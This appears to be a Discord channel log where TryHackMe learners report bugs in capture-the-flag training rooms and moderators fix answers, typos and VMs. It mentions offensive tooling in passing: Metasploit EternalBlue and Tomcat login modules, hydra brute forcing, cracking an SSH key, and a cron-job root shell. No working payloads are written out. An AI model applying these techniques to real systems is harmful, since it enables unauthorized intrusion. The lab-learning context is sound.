Hello- There maybe a potential bug in OWASP juice box, task 5 question 2. I input mc.safesearch@juice-sh.op and the password provided Mr.N00dles and it comes back as invalid email and password. thought maybe i had to do "forgot your password" but when I go in there it will not allow me to fill anything out but the email
@vast aurora there isnt a bug there

https://cdn.discordapp.com/attachments/522158539129618453/773625237027160124/unknown.png

for the room https://tryhackme.com/room/owaspjuiceshop the 7:3 Reflected xss does not post flag when it is done

@onyx wasp I very very vaguely remember having this issue- the resolution was to adjust one of the firefox settings.

okay i;ll have a look into it

I'll boot my VM and check the settings, see if it rings a bell.

@onyx wasp type about:config in the address bar, then after proceeding to preferences search bar enter browser.urlbar.filter.javascript set to False

Then I believe you just refresh the page and it appears.

yeah thanks that worked

No problem, might be worth a note being added to the question to make users aware of firefox's xss protection/js filter

is this a bug?

Check your VPN

!vpnscript

@bold ermine

Reset the box and do the same thing @river swallow

You probably crashed it or something from trying too much

Reset the box and do the same thing @river swallow
@vocal zinc okay. I'll try doing this. Thanks.

i am using VPN lol

That's not what they said, they said run the script @bold ermine it diagnoses issues

Reset the box and do the same thing @river swallow
@vocal zinc IT WORKED! Maybe I really crashed it somehow. Damn. xD

🥳

Hello- There maybe a potential bug in OWASP juice box, task 5 question 2. I input mc.safesearch@juice-sh.op and the password provided Mr.N00dles and it comes back as invalid email and password. thought maybe i had to do "forgot your password" but when I go in there it will not allow me to fill anything out but the email
@vast aurora There's a spacing

@onyx wasp type about:config in the address bar, then after proceeding to preferences search bar enter browser.urlbar.filter.javascript set to False
@north linden did this but still having the same issue as daemon. any other workaround?

That's the fix. It worked for Daemon

here's the setting

That's the fix. It worked for Daemon
@faint ridge was hoping it works for me though

You restarted Firefox?

I even refresh and restart firefox

yes i did

Move it to #room-help explain your issue. This isn't a bug with the room

lemme try restart the vm. if it persist, i'll moved it there. thanks!

Room: rptmux

Since answers are case insensitive, the incorrect version is considered correct (Top is g, not G)

That’s answer tolerance nothing can be done about that

No option for the room creator to force case sensitivity in answers?

Nope

Aaah - Oof.

Hi Everyone, in the Authenticate room on Task 4 #1, the base64 encoded example provided in the explanation is actually the answer to the question. The "identity" number is set to 2 in the example, but the encoded bit to access user2:guest2 is actually the admin string. Hope that's clear enough 🙂

Hello- currently in OWASP top 10, task 22. Not a bug just a grammar typo: " ...having to do the leg-work of write all lines of code. not sure if THM wants to be made aware of it, but there it is.

I'll fix that! Thanks @vast aurora That's my task for that day as well 😅

I could be wrong, but in Blaster room with a normal nmap scan (-sC -sV), I'm seeing a lot more ports open than the answer says

Known issue, windows machines are inconsistent with numbers of open ports

Does the hint just give you the answer?

Theres no hint for it

RIP ok. It's just windows being windows really

No worries, There were only a handful of answers after counting the *s

Blaster again, I'm afraid. As per the instructions, I've RDP'd into the machine, and am looking for Task3 #1 'Look around the machine and see if you can find the CVE which was researched on this server'. I'm 100% sure I'm looking in the right place, but there is no previous activity in that location

Yes that is a bug

Rightio

No internet history

I was careful to do no spoilers!

I think the CVE is pinned in #room-help ?

Merci 🙂

Hello, I'd like to report a wrong answer on a question for the room "Google dorking". On task 3 question 2: "Does "tryhackme.com" pass the “Keywords Usage Test?” (Yea / Nay)"

The answer that is accepted is "Nay" but the actual correct answer is "Yea" (as proved on this image)

If I can provide any other information, let me know.

Hi, thanks for reporting @desert solar - I'll get that updated

Hi! I'd like to report a problem in the room 'Learn Linux': i'm using the password 'shiba1' but it doesn't work, It returns 'permission denied'.

#room-help please

Chances are you're trying to access the wrong VM

Nothing has changed with Learn Linux

Thanks

Not sure if this has been reported yet, but the Password for the admin panel on the room Brute IT isn't the password that the answer takes. (at least it's not the one that I got from hydra that works)

Thanks, the testers are discussing this atm

Roger

That's reported just above your message 🙂

😄 oh :D:D:D

deleted it than

Muir's fixing it ATM

Should be fixed now, thanks to the two of you for reporting this

is the rsa key broken too ?

Not sure, will check in. What seems to be broken about it?

i cracked it with john but i cant login

load pubkey "id": invalid format

Cool thanks

Oh that's not actually an error

it will say that even when the key is valid, dw

ok so i did something wrong

Most likely 🙂

aa ok

works than

i fat fingered the password 😄

guys dont know if this is a glitch or what but on the metasploit room, on making cisco proud, the first question i gave this answer |||run autoroute -n 172.18.1.0 24 255.255.255.0 || and it returned correct. Now I am checking the video and the answer is ||run autoroute -s 172.18.1.0 -n 255.255.255.0 || is this a bug or either answers work ?

That's answer tolerance

You're close enough to the "correct" answer that THM just gives you it

meh

you say meh until you get a really hard and long answer and are struggling for one hour because there’s no answer tolerance

+1

Having an issue with "Authenticate" room - Task 2 Dictionary Attack. When I connect to the port on the first step there is an SSL error "SSL_ERROR_RX_RECORD_TOO_LONG". I'm not going through burp/zap proxy... just trying to connect to the site as stated in the instructions.

#room-help please, this is not a bug

thanks

Hi, metasploit room is stuck launching at 47% for more than 15 mins is that normal?

same for Vulnversity but at 5%

@wheat fractal That is a progress indicator, not a VM loading bar

It indicates how much of the room you've completed.

ohh thanks then my issue is connecting is weird because I'm connected with openvpn

but cant ping nor nmap them

Not all machines respond to pings, please use the appropriate help chats for help

Refrain from posting a question across multiple chats for starters 🙂 Also Screenshots are better than a photo of your screen

K sry

I am new to this

Anyone facing issues with Internal room?

After I enter the login credentials in CMS, server not found error occuring

not sure if this is a bug, ive asked around and it seems it shoudl work... but 'thompson' i cant brute force the creds. even the correct creds do not work in the brute force, and then, after a brute force the creds stop working for a time too. im guessing it maybe has brute force detection or something but yeahhh. If i am wrong please someone explain as its been stressing me out all morning thinking im incompetent. note - the creds work prior to a BF, but not during or after... ive booted the box 3/4 times and tried different ways but not once has the BF worked. i am brute forcing with the MSF module tomcat_mgr_login, hydra witha tomcat default wordlist, and with a custom script that i wrote, and another script from github. I tried with the custom scripts just the correct username and pass, and it worked, but with lots of other creds it fails.

@sterile sand I'm the creator. A bit more information on your issue would be helpful.

After I found the credentials in WPscan, and return back to the login page, once I entered the credentials the URL is getting changed to something thmhost and display server is down

Doesn't seem like a room issue.

Did you follow the instructions about modifying your /etc/hosts file?

Oops I forgot about it

Will rectify it

Thanks

the images in the room are no longer loading and the pages take too much time to load How can I solve this?

Your ISP is most likely blocking imgur. Change your DNS or try a VPN. @exotic cobalt

But I use your VPN service. Should I try another VPN region?

But I use your VPN service. Should I try another VPN region?
@exotic cobalt The THM VPN is a remote access VPN -- not an anonymising VPN

room 412 introductory networking- pcap file for wireshark does not contain any information

anyone else has a lot of fails running the exploit/windows/smb/ms17_010_eternalblue on /room/blue ?

Can you show options and post a screenshot please?

Sure will do.
Currently restarting the Target Machine and will try again (as mentioned in the description)

@eternal summit
Here it is:

That LHOST is incorrect, it needs to be your VPN IP, your tun0 IP. In future, can I get you to ask in #room-help first please?

Allright thx. Sure. It was just that yesteraday I hadn't configured LHOST and it worked (sometimes)

Also it mentioned that it might fail in the task description 🙂

Thx 4 your help, will try the LHOST thingy

It will fail every time if your settings are incorrect

That makes sense, but for some reason It worked yesterday. Probably LHOST was set sometime somewhere somehow. Maybe a save or so...

I read about saving some options variables in the metasploit room witch I did a few days ago.

In the room Corp Admin password is expired and asked to be changed when connecting through rdp, which is really really anoying to try to copy letter by letter the original password to change

from my understanding it’s intended

Oh ... okay.

@twin tapir can I ask if we should change the password or there is something else to do ?

Have you looked at writeups?

Yes I did

one did an "exploit" not "authorized" the other does not specify anything regarding this issue.

You can probably just change the password 🤷‍♂️

I tried a few times without success. (without copy paste into RDP with an AZERTY keyboard is not easy to copy a 20long random char password ! )
I gave up since you said it was intended 🙂
I'm going to try again I guess

I can confirm you have indeed to change the password manually. I did at least 30 attempt to do this... really unconveniant and there is nothing to learn with this...

especially with capital I which could easily mistaken with minus l

Room MAL: REMnux - The Redux task 6 run volatility -f Win7-Jigsaw.raw imageinfo getting error. other commands are fine

Hi, can you share the error message please?

Oofta I think I've identified it

Now thinks the MN in CMN stands for Minnesota. 😉

Oofta!

Hey guys I am facing some issues on uploading rooms

Whenever I try to upload it says connection intrupted. But I had a good internet connection. Can I able to send download link insted of upload room

If you’re continuously having issues you could put it in google drive and ask one of the admins nicely if they can upload it for you

might be something bee can do as well but don’t know if they have those perms yet

Given Bee's in support, I doubt they'll be given AWS creds

Can you move a material from one to another?

Facing almost 7+ hours

If you’re continuously having issues you could put it in google drive and ask one of the admins nicely if they can upload it for you

In the Madness room I couldn't get the shell exploit for the suid binary to get root to work for some reason and couldn't find another way to get access to that flag 😦
Really enjoyed that room otherwise though 🙂

box : rpnessus task-4 (scanning !) : The answer for the apache version does not match with the VM.

I am aware of an issue with NIS Linux Part One that is going to be fixed soon. Apologies for that!

Room MAL: REMnux - The Redux task 6 run volatility -f Win7-Jigsaw.raw imageinfo getting error. other commands are fine
@lethal dagger I've just written a workaround for this in the tasks (essentially skip this part, the answer is now provided). Volatility is really struggling to perform that step on the limited resources available on such a large memory dump. Thanks for letting us know

no probs, cheers bro!

Room NIS - Linux Part I the answers need to be case senstive.

How do you show information that comes from a symlink using ls? ls -l passed it

erm, not sure what you mean @lethal dagger which question is that referring to?

I am aware of an issue with NIS Linux Part One related to binwalk that is going to be fixed soon. Apologies for that!
Issue has been fixed

Hi @obsidian flame , Task 2 ls How do you show information that comes from a symlink using ls? it accepts the ls -l

I've cleaned the cache and re-login again. it still showing ls -l

hmm, let me double check that right now

i mean -L just shows you the file being referenced by the symlink

you are right, i might change the wording to the question

done, refresh @lethal dagger

not a lot of people look specifically at the symlink so i don't think it's worth mentioning

But, if i see more challenges that address symlinks i might as well get a Linux Part II

checked ✅

thanks for letting me know about it, any feedback is also welcomed ^^

cooli, Linux Part II sounds great

"Intro to x8664" has had a url 404'ing for at least of couple of months (reported on the forums)

I've replaced it with an archived copy from the way back machine:

https://tryhackme.com/thread/5fa2d6fd27e5db646c6f7a28#last

@dusky junco pro haxx0r using wayback machine for something practical

👀

Room: OWASP Top 10
Task 20, second question.

Hello. I don't know if this intended or not either but the link: _http://MACHINE-IP/reflected_ is not working. It is not hard to find the reflected page but using the one mentioned in the question is a little deceiving. In order to work it should be at least _http://MACHINE-IP/reflected?keyword_. I hope I'm not wrong 😄

Right. I have had enough of that question. I'm having a shave, then it's getting fixed 😆

Actually. Better idea. @dusky junco go fix 😁

Various things with that room are being fixed - it's on my todo today. Just carrying on a little bit from yesterday

There we go 😄

However I shall do! The user's gotta use the "reflected" button on the home page, right?

Yep, exactly. Remove the page from the link, and add an instruction about using the button

Perfecto, just as thought

🥰

Fixed, a refresh will do update the task (also made the URL's open in a new tab) @undone drift @obsidian kiln

Awesome. Ta CMN

@obsidian flame Task 2 last question is incorrect, unless you specify non-hidden and non-recursive.

(Nis Linux)

ok, thanks for that, you are right

refresh @eternal summit

better now?

Yep, thanks

No worries, thank you for letting me know

@obsidian flame The curl question, there's no indication that it wants you to use silent mode. It works just fine without silent mode, other than you see the progress

thanks for spotting that out

fixed @eternal summit

Wget task

Mask definitely doesn't line up with the correct answer

yeah expected answer ignores the fact you're asked to get the flag.txt

yikes how did i miss that one

lol

solved now

anything else while we are at this chapter

On the room? You name the achieve extension and 7z should be the tool for you. should read archive probably? in the zip section

grammarly done its job properly

done

if you want to do the tasks use this ip 10.10.98.255

it 's up for another 27 mins

Minor grammar issue found in the room: NIS - Linux Part I: https://tryhackme.com/room/nislinuxone Task 2, Question 4. Too many words, the word "information" should be removed.

fixed @torpid glade please refresh

Wow quick response thank you for fixing it :)

(if you try to say about 7z being borked i am aware of that)

no worries ^^

Thank you for the heads up, I will leave that one for later if I can't get past it.

Great room by the way

thank you for your feedback and sorry for the issues caused

No worries. 🙂

forbusinessreasons seems docker container doesn't start. ports stay closed

The backend of "ConvertMyVideo" is not working 😦

Huh?

Room: For Business Reasons

The ports do not open when you deploy the machine.

@burnt prairie Sorry to tag, but I think something might be awry in Startup - But wanted to run it past your first to see if it's me being silly first

ofc whats up

@sonic rover

Ok, Just so you know - It was fine the other day and I got a shell.

I logged off, then logged on again and my exploit didnt work again and it drove me mad

I checked the writeups and the one glaring difference is that the jpg file from the folder is missing

And my exploit didnt work, obvs

alright can you dm me the details uncle, ill help you out

Sure

Huh?
@vocal zinc
The "Converter" doesn't awnser or process any requests

The backend//api

Can you show what you’re expecting to happen when you do something vs what actually does?

S*** 😅 maybe tomorrow

I already turned off the computer and just saw your answer now

Im sorry

Nothing to be sorry about

Room: Buffer Overflows.
The answer should be "rip" not "rax"

http://phrack.org/issues/49/14.html#article
From: "Smashing The Stack For Fun And Profit"

"This pushes the 3 arguments to function backwards into the stack, and
calls function(). The instruction 'call' will push the instruction pointer
(IP) onto the stack.** We'll call the saved IP the return address (RET). The
first thing done in function is the procedure prolog:"**

While rax stores the return value of the called function.

hey, error in https://tryhackme.com/room/nislinuxone task 2 question n-1. "How do you do a recursive ls?" looks for ls -recursive but this is incorrect. Either ls --recursive or (to match the picture included) ls -R will work

@cobalt otter it's answer tolerance

oh, didn't seem to take --recursive for me, perhaps I made a typo though, cool

refresh your screen

yeah, it's updated, nice!

(i haven't changed anything)

it's just the answer tolerance picking up your answer as correct

cheers

no problemo

@obsidian flame Hi Chevalier has the bug with ||grep|| been fixed on your "NIS - Linux part I" ?

yes

i pinged you in room hints yesterday @wheat fractal

I haven't received the ping I don't know why, also I don't see the message now. Anyway thanks for the fix 🙂 @obsidian flame

nmap does not want to work on Ice room Task 2 Recon. Is this a bug? I tried resetting the box 4 times now.

i just tagged you on room help

Hi 🙂 I come here because, I have problems on For Business Reasons room. When I ran nmap, all ports are closed ( port 80 included). I can't access to the web page at all ... @cobalt otter As the same problem on my room ip : 10.10.37.158.

I get the same issue on "For Business Reasons", launched the room, tried nmap after 5, 10 & 15 mins, port 80 closed in all cases

Hi there, it seems that room https://tryhackme.com/room/heartbleed can't load the VM

have you tried terminating and redeploying?

yes

tried 2 times.

Do you have any errors in your web browser console? I've just deployed one fine Perhaps try a different browser

@dusky junco it does work back. thanks.

Wicked 👍

It possible I found a bug in the room Blaster when I do an nmap scan I get 3 open ports as a result and when I answer the question as to how many open ports there are it seems to be incorrect

I looked it up and other people get 2 ports which is the answer

I already tried to restart the machine and I get the same open ports

It's a Windows thing

Also I get no version output for the ports

So you mean that it's because my VM is running on windows?

I also got different ports from the example I was looking at

The target VM is windows

Windows is inconsistent with open ports

ok thank you

I'd also ask in #room-help because you should at least get 2 of the same ports

Hi 🙂 I come here because, I have problems on For Business Reasons room. When I ran nmap, all ports are closed ( port 80 included). I can't access to the web page at all ... @cobalt otter As the same problem on my room ip : 10.10.37.158.
@wheat fractal Same issue all ports are closed

I'm getting publicly available IPs on Heartbleed. Is it expected?

yes

because you are supposed to exploit an HTTPS

i think he tries to say that it has a public ip

I'm having issues with the eternalblue POST meterpreter upgrade module - has anyone completed this recently or can confirm the issue I'm seeing is maybe localized to my environment

The default payload is now a meterpreter so you no longer need to use that module.

In future, questions like that would be best suited to #room-help, directly showing us what the issue is rather than asking if anyone has completed it recently.

understood thank you for the response

Hi, When I use enum4linux(Tried enum4linux-ng) on the 2 different rooms

Dest. IP address is down. Tried terminate and redeploy but after enum4linux I'm getting same issue 😄

Example rooms: relevant, nerdherd

Is it this normal?

Room - Learn Linux

Not sure if this was supposed to be the right anwser, but I would have though it would be "-n" and not just "-"?

If you refresh, does it change?

If so, that's either answer tolerance or you removed the n between submission and acceptance

Yeah that worked sorry

hi i am having trouble with cc:steganography task 4 exiftool.

i was unable to download i think there is problem with the download

@lone dust just do
sudo apt-get install exiftool

It suggests an apt update so that's the best idea. This isn't really a bug with the room, it's an issue with your system.

did i just find a bug?

Answer tolerance

it’s intended

ahh okay lol

For https://tryhackme.com/room/googledorking

This website https://seositecheckup.com/ is required for some questions but their checker is currently not working.

@dusky junco that one's yours

Ah yeah, it appears it isn't

same room some links are raw text and ref to question #3 is in fact question #1

That's no good

Bare with 👍

That tool has changed since, just updating the questions

Okay, please refresh @teal barn thanks for reporting. That room should be future proof now 😅

haha yes

Hi, When I use enum4linux(Tried enum4linux-ng) on the 2 different rooms
@brisk fox again down :/

That’s not enum4linux...?

Regardless of the tool I use, all kinds of VM crashes. I don't understand 😦

I mean. Rpcclient isn’t going to work unless rpc is open

I have no clue which room you’re doing or if rpc is open and seeing that you said “enum4linux” and then showed using rpcclient I’m leaning towards this being user error

I was used 2 different rooms(Relevant and NerdHerd). When I use rpcclient or enum4linux(Some enum4linux functions are uses rpcclient on background) I hadn't reaching remote server. Maybe I have bad luck I don't know. Sorry I'm late. My english not very well. I was use google translate for tell you of the in my mind.

You need to give more information. Like screenshots preferably

Okey I will send. Ty.

Hi i found in the 25daysofchristmas room, is it worth mentioning it?

https://tryhackme.com/room/dailybugle
typo error in description ("practice")

-Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.
+Compromise a Joomla CMS account via SQLi, practice cracking hashes and escalate your privileges by taking advantage of yum.

Practise is the British way to spell it.

@teal barn

Practice is the American

Why they have both in there idk

In Australian and British English, 'practise' is the verb and 'practice' is the noun.

hello, im on room of LLE and found that on task #1 , instead of saying MACHINE_IP it says MACHINE_UP. @next bluff

Fixed, thank you for reporting

unable to ssh in psycho_break machine anyone can look into issue?

@tacit shadow Kindly see

ssh kidman@10.10.228.91
ssh: connect to host 10.10.228.91 port 22: Connection refused

Good chance that SSH isn't open on port 22 then.🙂

let me show you

@obsidian kiln nmap -sV 10.10.196.96
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-15 21:50 IST
Nmap scan report for 10.10.196.96
Host is up (0.15s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

ok it worked idk how

Those are two different ips

i powered up machine once again

so obvious ip will change

Hey @high palm whats up. The ssh is supposed to be opened and it's working fine.

It works

Maybe rebooting the box might help .

i did same

but this box really gave me trouble

in technical kar

term

btw @tacit shadow how much time it will till i get root console its been 15 min already

Sorry @high palm I couldn't get u. Do you mean the time it takes to get root shell ?

yea

usually like 2-3 mins

i saw cron job pasted script

been 20 min

can i dm you for if any issue in script

yeah sure

been 20 min
@high palm run whatever you have in the script locally to see if it works as you’re expecting

i did found the issue

I figured you had. That was just a general tip

i didnt add subprocess library

not sure whether im ready for 0X13

Everyone makes mistakes

except me

Yeah

You just are a mistake

That’s not the correct answer

You’re missing one number

Yes

https://tryhackme.com/room/ccpentesting

@dusky junco

I don’t see the bug 👀

What am I missing 😱

How would you set SMBPass to "username"

?

How would you set the SMBUser to "password"

Smh meowware

I thought it was intentional

You never know maybe they want the user to be password

Yeah I thought it's intentional too

@wheat fractal shed some light pls

It is intentional

To make sure you read the question

🤔

That's intentional?

Comes across as poor spell checking

I mean, that's 100% stereotypical Para

Turning things upside down to throw people off balance

Each to their own

For Crack the hash, Task 2 Question #3, it provides a sha512crypt hash with salt "aReallyHardSalt" and rounds: 5. but the indented solution uses default rounds instead of rounds: 5 ?

https://tryhackme.com/room/crackthehash

i have a bug in jack. but talking about it will give something away. where can i discuss this safely ?

I need some assistance. I'm having trouble accessing the web server url in the LFI room for the Web Fundamentals path.
@kind knot wrong channel room help is 5 stories up

ah my bad

ty